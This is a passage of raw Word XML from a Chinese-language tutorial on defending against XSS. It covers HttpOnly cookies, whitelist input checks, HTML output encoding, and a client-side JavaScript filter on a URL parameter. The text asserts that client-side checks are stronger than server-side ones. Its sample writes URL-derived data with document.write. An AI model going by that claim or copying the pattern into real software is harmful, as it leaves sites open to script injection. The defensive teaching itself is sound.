        <w:t>浏览器将禁止页面的</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>访问带有</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>属性的</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，解决</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击后的</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>会话劫持行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w: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httpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>是在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Set-Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>时进行标记的，设置的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>头格式如下：</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    Set-Cookie: &lt;name&gt;=&lt;value&gt;[; &lt;name&gt;=&lt;value&gt;]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    [; expires=&lt;date&gt;][; domain=&lt;domain_name&gt;]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    [; path=&lt;some_path&gt;][; secure][; HttpOnly]</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以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>为例，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>php 5.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>版本时就已经在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Setcookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>函数加入了对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的支持，如</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lastRenderedPageBreak/>
        <w:t>    &lt;?php</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    setcookie("user", "admin", NULL, NULL, NULL, NULL, TRUE); </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    ?&gt;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通过以上代码就可以设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，将其设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>setcookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>函数实质是通过向客户端发送原始的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>报文头进行设置的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>将不可见这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，所以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>就取不到这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，也就是先了对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的保护。</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Style w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>完善的输入和输出检查</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由于三种</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跨站脚本攻击类型的漏洞成因可不相同，针对输入输出的检查一部分适用于反射型</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与存储型</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，而另外一些检查适用于基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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A. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>防范反射型</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和存储型</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</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8C239C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>输入检查在大多数的时候都是对可信字符的检查或输入数据格式的检查，如用户输入的注册账号信息中只允许包括字母、数字、下划线和汉字等，对于输入的一切非白名单内的字符均认为是非法输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。数据格式如输入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>地址、电话号码、邮件地址、日期等数据都具有一定的格式规范，只有符合数据规范的输入信息才允许通过检查。</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输出检查主要是针对数据展示过程中，应该对数据信息进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>编码处理，将可能存在导致</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跨站脚本攻击的恶意字符进行编码，在不影响正常数据显示的前提条件下，过滤恶意字符。常见的可能造成</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跨站脚本攻击的字符及其</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>编码如下：</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 &amp;quot;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 &amp;apos;</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&amp; &amp;amp;</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&lt; &amp;lt;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    &gt;  &amp;gt;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除了常用的编码外，任何字符都可以使用其</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>码进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>编码，如</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    % &amp;#37;</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    * &amp;#42;</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B. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>防范基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</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从基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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的定义及其触发方式我们发现，当基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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跨站脚本攻击发生时，恶意数据的格式与传统的</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跨站脚本攻击数据格式有一定的差异，甚至可以在不经过服务器端的处理和相应的情况下，直接对客户端实施攻击行为，因此上述我们应用于防范反射型</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和存储型</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的方法并不适用于防范基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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跨站脚本攻击。</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针对基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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防范的输入检查方法，</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>我们发现在客户端部署相应的安全检测代码的过滤效果要比在服务器端检测的效果更加明显</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。例如，我们可以通过如下客户端检测代码来保证用户输入的数据只包含字母、数字和空格，代码如下：</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&lt;script&gt;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var str = document.URL;</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str = str.substring(str.indexOf("username=")+9, str.length);</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str = unescape(str);</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var regex=/^([A-Za-z0-9+\s])*$/;</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if (regex.test(str))</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 document.write(str);</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lastRenderedPageBreak/>
        <w:t>&lt;/script&gt;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同样，我们也可以通过在服务端实现类似上述数据检查的功能，如在服务器端检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>参数是否为预定的参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>username,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>并对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>参数的内容进行检测，确认数据内容是否为只包含数字、字母和空格符，实现服务端的数据过滤。但是，由于客户端数据的可控性，这种服务端检测的效果要明显弱于客户端检测。</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基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的</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输出检查与反射型</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漏洞输出检查的方法相似，在将用户可控的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
